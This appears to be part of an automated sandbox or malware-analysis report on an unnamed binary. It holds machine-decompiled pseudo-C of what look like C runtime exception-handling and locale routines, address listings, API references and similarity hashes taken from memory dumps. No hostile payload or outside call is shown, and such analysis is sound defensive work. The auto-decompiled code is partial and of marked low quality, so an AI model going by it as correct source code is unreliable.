                                                                                                                                                                              									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                              									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                              										goto L46;
                                                                                                                                                                              									}
                                                                                                                                                                              									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                              									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                              										goto L20;
                                                                                                                                                                              									}
                                                                                                                                                                              									goto L46;
                                                                                                                                                                              								}
                                                                                                                                                                              							} else {
                                                                                                                                                                              								goto L16;
                                                                                                                                                                              							}
                                                                                                                                                                              							while(1) {
                                                                                                                                                                              								L16:
                                                                                                                                                                              								__eflags =  *((intOrPtr*)(0x66db4200 + _t58 * 4)) - _t110;
                                                                                                                                                                              								if( *((intOrPtr*)(0x66db4200 + _t58 * 4)) == _t110) {
                                                                                                                                                                              									break;
                                                                                                                                                                              								}
                                                                                                                                                                              								_t58 = _t58 + 1;
                                                                                                                                                                              								__eflags = _t58 - _t81;
                                                                                                                                                                              								if(_t58 < _t81) {
                                                                                                                                                                              									continue;
                                                                                                                                                                              								}
                                                                                                                                                                              								goto L18;
                                                                                                                                                                              							}
                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                              							if(_t58 <= 0) {
                                                                                                                                                                              								goto L5;
                                                                                                                                                                              							}
                                                                                                                                                                              							 *0x66db4240 = 1;
                                                                                                                                                                              							__eflags =  *0x66db4240;
                                                                                                                                                                              							if( *0x66db4240 != 0) {
                                                                                                                                                                              								goto L5;
                                                                                                                                                                              							}
                                                                                                                                                                              							__eflags =  *((intOrPtr*)(0x66db4200 + _t58 * 4)) - _t110;
                                                                                                                                                                              							if( *((intOrPtr*)(0x66db4200 + _t58 * 4)) == _t110) {
                                                                                                                                                                              								L32:
                                                                                                                                                                              								_t100 = 0;
                                                                                                                                                                              								__eflags = _t58;
                                                                                                                                                                              								if(_t58 < 0) {
                                                                                                                                                                              									L34:
                                                                                                                                                                              									 *0x66db4240 = 0;
                                                                                                                                                                              									goto L5;
                                                                                                                                                                              								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x66db4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x66db41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x66db4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x66db4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x66db248f
0x66db2492
0x66db2498
0x66db24b6
0x00000000
0x66db24b6
0x66db24a0
0x66db24a9
0x66db24af
0x66db24be
0x66db24c1
0x66db24c4
0x66db24ce
0x66db24ce
0x66db24d0
0x66db24d3
0x66db24d5
0x66db24d5
0x66db24d7
0x66db24da
0x00000000
0x00000000
0x66db24dc
0x66db24de
0x66db2544
0x66db2544
0x66db26a2
0x00000000
0x66db26a2
0x66db24e0
0x66db24e0
0x66db24e4
0x66db24e6
0x66db24e6
0x66db24e6
0x66db24e6
0x66db24e9
0x66db24ea
0x66db24ed
0x66db24ed
0x66db24f1
0x66db24f5
0x66db2503
0x66db2503
0x66db250b
0x66db2511
0x66db2513
0x66db2515
0x66db2525
0x66db2532
0x66db2536
0x66db253b
0x66db253d
0x66db25bb
0x66db25bb
0x66db253f
0x66db253f
0x66db253f
0x66db25bd
0x66db25bf
0x66db26a0
0x66db26a0
0x00000000
0x66db25c5
0x66db25c5
0x66db25cc
0x00000000
0x00000000
0x66db25d2
0x66db25d6
0x66db2632
0x66db2634
0x66db263c
0x66db263e
0x66db2640
0x00000000
0x00000000
0x66db2642
0x66db2648
0x66db264a
0x66db264c
0x66db2661
0x66db2661
0x66db2663
0x66db2692
0x66db2699
0x00000000
0x66db2699
0x66db2667
0x66db2668
0x66db266a
0x66db266c
0x66db266c
0x66db266e
0x66db2670
0x66db2672
0x66db2686
0x66db2686
0x66db2689
0x66db268b
0x66db268b
0x66db268c
0x66db268c
0x00000000
0x66db2674
0x66db2674
0x66db2674
0x66db267d
0x66db267e
0x66db2680
0x66db2682
0x66db2682
0x00000000
0x66db2674
0x66db2672
0x66db264e
0x66db2655
0x66db2655
0x66db2657
0x00000000
0x00000000
0x66db2659
0x66db265a
0x66db265d
0x66db265f
0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db265f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2655
                                                                                                                                                                              0x66db25d8
                                                                                                                                                                              0x66db25db
                                                                                                                                                                              0x66db25e0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db25e9
                                                                                                                                                                              0x66db25eb
                                                                                                                                                                              0x66db25f1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db25f7
                                                                                                                                                                              0x66db25fd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2603
                                                                                                                                                                              0x66db2605
                                                                                                                                                                              0x66db260e
                                                                                                                                                                              0x66db2612
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2618
                                                                                                                                                                              0x66db261b
                                                                                                                                                                              0x66db261d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2624
                                                                                                                                                                              0x66db2626
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2628
                                                                                                                                                                              0x66db262c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db262c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2517
                                                                                                                                                                              0x66db2517
                                                                                                                                                                              0x66db2517
                                                                                                                                                                              0x66db251e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2520
                                                                                                                                                                              0x66db2521
                                                                                                                                                                              0x66db2523
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2523
                                                                                                                                                                              0x66db254b
                                                                                                                                                                              0x66db254d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db255d
                                                                                                                                                                              0x66db255f
                                                                                                                                                                              0x66db2561
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2567
                                                                                                                                                                              0x66db256e
                                                                                                                                                                              0x66db259a
                                                                                                                                                                              0x66db259a
                                                                                                                                                                              0x66db259c
                                                                                                                                                                              0x66db259e
                                                                                                                                                                              0x66db25b2
                                                                                                                                                                              0x66db25b4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db25a0
                                                                                                                                                                              0x66db25a0
                                                                                                                                                                              0x66db25a0
                                                                                                                                                                              0x66db25a9
                                                                                                                                                                              0x66db25aa
                                                                                                                                                                              0x66db25ac
                                                                                                                                                                              0x66db25ae
                                                                                                                                                                              0x66db25ae
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db25a0
                                                                                                                                                                              0x66db2570
                                                                                                                                                                              0x66db2573
                                                                                                                                                                              0x66db2575
                                                                                                                                                                              0x66db2587
                                                                                                                                                                              0x66db2587
                                                                                                                                                                              0x66db258a
                                                                                                                                                                              0x66db258c
                                                                                                                                                                              0x66db258c
                                                                                                                                                                              0x66db258d
                                                                                                                                                                              0x66db258d
                                                                                                                                                                              0x66db2593
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2577
                                                                                                                                                                              0x66db2577
                                                                                                                                                                              0x66db2577
                                                                                                                                                                              0x66db257e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2580
                                                                                                                                                                              0x66db2580
                                                                                                                                                                              0x66db2581
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2581
                                                                                                                                                                              0x66db2583
                                                                                                                                                                              0x66db2585
                                                                                                                                                                              0x66db2598
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2598
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2585
                                                                                                                                                                              0x66db24f7
                                                                                                                                                                              0x66db24fa
                                                                                                                                                                              0x66db24fd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db24ff
                                                                                                                                                                              0x66db2501
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2501
                                                                                                                                                                              0x66db24c6
                                                                                                                                                                              0x66db24c8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000

APIs
• NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 66DB2536
Memory Dump Source
• Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
Similarity
• API ID: MemoryQueryVirtual
• String ID:
• API String ID: 2850889275-0
• Opcode ID: c32d686900352fc2914432cbedbbda1cbf4dd1c02312073a55662335aef9756c
• Instruction ID: ce00460210b744401274f97c292c8fb490fda183760ee4fcf466e1ae07ae3961
• Opcode Fuzzy Hash: c32d686900352fc2914432cbedbbda1cbf4dd1c02312073a55662335aef9756c
• Instruction Fuzzy Hash: 8B61C5F2E14612CFEB19CF28C8A077973F1AB9A35DB248429D557C729CE730D842CA94
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 71%
E66DB2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
    intOrPtr _v8;
    char _v12;
    void* __ebp;
    signed int* _t43;
    char _t44;
    void* _t46;
    void* _t49;
    intOrPtr* _t53;
    void* _t54;
    void* _t65;
    long _t66;
    signed int* _t80;
    signed int* _t82;
    void* _t84;
    signed int _t86;
    void* _t89;
    void* _t95;
    void* _t96;
    void* _t99;
    void* _t106;

    _t43 = _t84;
    _t65 = __ebx + 2;
    *_t43 = *_t43 ^ __edx ^ *__eax;
    _t89 = _t95;
    _t96 = _t95 - 8;
    _push(_t65);
    _push(_t84);
    _push(_t89);
    asm("cld");
    _t66 = _a8;
    _t44 = _a4;
    if((*(_t44 + 4) & 0x00000006) != 0) {
        _push(_t89);
        E66DB23CB(_t66 + 0x10, _t66, 0xffffffff);
        _t46 = 1;
    } else {
        _v12 = _t44;
        _v8 = _a12;
        *((intOrPtr*)(_t66 - 4)) = &_v12;
        _t86 = *(_t66 + 0xc);
        _t80 = *(_t66 + 8);
        _t49 = E66DB2485(_t66);
        _t99 = _t96 + 4;
        if(_t49 == 0) {
            *(_a4 + 4) = *(_a4 + 4) | 0x00000008;
            goto L11;
        } else {
            while(_t86 != 0xffffffff) {
                _t53 = *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                if(_t53 == 0) {
                    L8:
                    _t80 = *(_t66 + 8);
                    _t86 = _t80[_t86 + _t86 * 2];
                    continue;
                } else {
                    _t54 = *_t53();
                    _t89 = _t89;
                    _t86 = _t86;
                    _t66 = _a8;
                    _t55 = _t54;
                    _t106 = _t54;
                    if(_t106 == 0) {
                        goto L8;
                    } else {
                        if(_t106 < 0) {
                            _t46 = 0;
                        } else {
                            _t82 = *(_t66 + 8);
                            E66DB2370(_t55, _t66);
                            _t89 = _t66 + 0x10;
                            E66DB23CB(_t89, _t66, 0);
                            _t99 = _t99 + 0xc;
                            E66DB2467(_t82[2]);
                            *(_t66 + 0xc) = *_t82;
                            _t66 = 0;
                            _t86 = 0;
                            *(_t82[2])(1);
                            goto L8;
                        }
                    }
                }
                goto L13;
            }
            L11:
            _t46 = 1;
        }
    }
    L13:
    return _t46;
}

Memory Dump Source
• Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
• Instruction ID: f346de6bb1f4383d71244993f3802f605830ceb403d1faf00df7ec041cf7fbaa
• Instruction Fuzzy Hash: DC2174B3900204DBDB11DF68CC809BBBBA5FF49358B458168D9569B249DB30FA15CBE0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.1014767810.0000000066DFB000.00000040.00020000.sdmp, Offset: 66DFB000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
• Instruction ID: 01d17200c03a281cce422d118cefa4de363f8d0bcc28a903e50b13bf664be685
• Instruction Fuzzy Hash: 271181737505009FD714CF59ECC0EA2B3AAEB9927072A8566ED08CB355D636E852C7A0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.1014767810.0000000066DFB000.00000040.00020000.sdmp, Offset: 66DFB000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
• Instruction ID: cbe950c9313282bc840db58f830b8550d4280686989efd8c88db6aeb8cce91b3
• Instruction Fuzzy Hash: BC01D23A324140CFD744CF2CD984D69B7F4EFC5320B16807EC44683656D135E446CA60
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
Similarity
• API ID: __calloc_crt$___freetlocinfo___removelocaleref$__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
• String ID:
• API String ID: 3967206232-0
• Opcode ID: 58edc2626cea369d9bd2bf9cad0fd8da07ab6484f9637d7230123ac1d116b8ec
• Instruction ID: ed153e7a49f4c056e02f723f7bc5717cfc3f2ee639753e2fd9f5520210ab885d
• Instruction Fuzzy Hash: 0F213831545701EBEF315F24DD00E4A7FF5EFA6724B504419F4986A5E0DF31A800C6B0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __lock.LIBCMT ref: 66DEAD6B
  • Part of subcall function 66DE74AB: __mtinitlocknum.LIBCMT ref: 66DE74C1
  • Part of subcall function 66DE74AB: __amsg_exit.LIBCMT ref: 66DE74CD
• __lock.LIBCMT ref: 66DEADAB
• ___removelocaleref.LIBCMT ref: 66DEADBA
• ___freetlocinfo.LIBCMT ref: 66DEADD3
  • Part of subcall function 66DE927A: __lock.LIBCMT ref: 66DE9298
  • Part of subcall function 66DE927A: ___sbh_find_block.LIBCMT ref: 66DE92A3
  • Part of subcall function 66DE927A: ___sbh_free_block.LIBCMT ref: 66DE92B2
Memory Dump Source
• Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
Similarity
• API ID: __lock$___freetlocinfo___removelocaleref___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
• String ID:
• API String ID: 2822171422-0
• Opcode ID: feb46607815f43d331bef93ad53a7cb76f8c45456e0f14c504f85b4f836d4b2a
• Instruction ID: 0bd05eea2dc5e870b771cdddbdf79b51487a81cd16a8979b0736d0dbc6703cf5
• Instruction Fuzzy Hash: E111A039A01702EBDB208F64980470E7BB4AF80B26F684519E8A9DB1C0EB75D881C670
Uniqueness
Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 66DEAC2B
  • Part of subcall function 66DE8F2A: __getptd_noexit.LIBCMT ref: 66DE8F2D
  • Part of subcall function 66DE8F2A: __amsg_exit.LIBCMT ref: 66DE8F3A
• __getptd.LIBCMT ref: 66DEAC42
• __amsg_exit.LIBCMT ref: 66DEAC50
• __lock.LIBCMT ref: 66DEAC60
Memory Dump Source
• Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID:
• API String ID: 3521780317-0
• Opcode ID: dc0ddddfc0f3be1efff0c4b580e1e8a09aad0bb8b5e6f8e209a9bb275d3cbf43
• Instruction ID: 428e17e1409b1ff7272075dd2d896dafccd1f0273c70f301100df014f339cabf
• Instruction Fuzzy Hash: 1FF0BE36F40716EBEB20DF74980074DBBB1AF40728F09820AE5409B2C0DB74A902CB72
Uniqueness
Uniqueness Score: -1.00%